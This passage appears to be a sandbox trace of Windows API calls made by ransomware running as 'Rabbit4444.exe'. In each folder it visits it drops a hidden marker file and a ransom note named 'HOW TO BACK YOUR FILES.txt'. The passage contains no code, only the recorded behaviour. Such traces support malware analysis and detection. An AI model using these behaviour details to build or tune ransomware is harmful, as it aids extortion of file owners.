dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.684] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.684] CloseHandle (hObject=0x2cc) returned 1 [0065.684] CloseHandle (hObject=0x2a0) returned 1 [0065.684] GetCurrentThreadId () returned 0xd98 [0065.684] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0065.684] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory" [0065.684] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.684] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0065.684] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory" [0065.684] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\" [0065.684] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0065.684] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.686] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.688] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.689] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.689] CloseHandle (hObject=0x2a0) returned 1 [0065.695] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory") returned 92 [0065.695] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.695] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e90475, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0784e11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0065.695] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.695] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.695] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.695] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.695] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e90475, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0784e11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.695] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.695] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.695] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.695] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.695] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.695] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0784e11, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0784e11, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf07ab040, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.695] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.695] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.695] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0784e11, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0784e11, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf07ab040, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.695] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0065.695] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.696] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.696] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.696] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.697] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.697] CloseHandle (hObject=0x2cc) returned 1 [0065.697] CloseHandle (hObject=0x2a0) returned 1 [0065.697] GetCurrentThreadId () returned 0xd98 [0065.697] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0065.697] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies" [0065.697] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0065.697] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0065.697] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies" [0065.697] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\" [0065.697] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0065.697] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.698] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.701] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.702] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.702] CloseHandle (hObject=0x2a0) returned 1 [0065.702] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies") returned 92 [0065.702] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.703] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e8fc7a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf07ab040, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0065.703] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.703] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.703] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.703] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.703] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e8fc7a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf07ab040, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.703] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.703] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.703] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.703] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.703] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.703] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf07ab040, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf07ab040, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf07d1393, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.703] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.703] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.703] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf07ab040, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf07ab040, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf07d1393, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.703] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0065.703] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.703] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.704] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.704] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.705] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.705] CloseHandle (hObject=0x2cc) returned 1 [0065.705] CloseHandle (hObject=0x2a0) returned 1 [0065.705] GetCurrentThreadId () returned 0xd98 [0065.705] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221e8 [0065.705] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache" [0065.705] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122fc0 | out: hHeap=0xe0000) returned 1 [0065.705] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221e0 | out: hHeap=0xe0000) returned 1 [0065.705] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache" [0065.705] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\" [0065.705] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0065.705] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.706] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.708] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.709] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.709] CloseHandle (hObject=0x2a0) returned 1 [0065.709] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache") returned 90 [0065.710] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.710] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e8f3a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf07d1393, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0065.710] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.710] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.710] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.710] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.710] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1fd784cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd0e8f3a9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf07d1393, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.710] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.710] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.710] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.710] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.710] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.710] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf07d1393, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf07d1393, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf07d1393, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.710] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.710] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.710] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf07d1393, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf07d1393, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf07d1393, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.710] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0065.710] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.710] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.711] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.711] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.711] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.711] CloseHandle (hObject=0x2cc) returned 1 [0065.711] CloseHandle (hObject=0x2a0) returned 1 [0065.711] GetCurrentThreadId () returned 0xd98 [0065.711] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11cfc8 [0065.711] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy" [0065.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dd00 | out: hHeap=0xe0000) returned 1 [0065.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11cfc0 | out: hHeap=0xe0000) returned 1 [0065.712] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy" [0065.712] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\" [0065.712] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\", 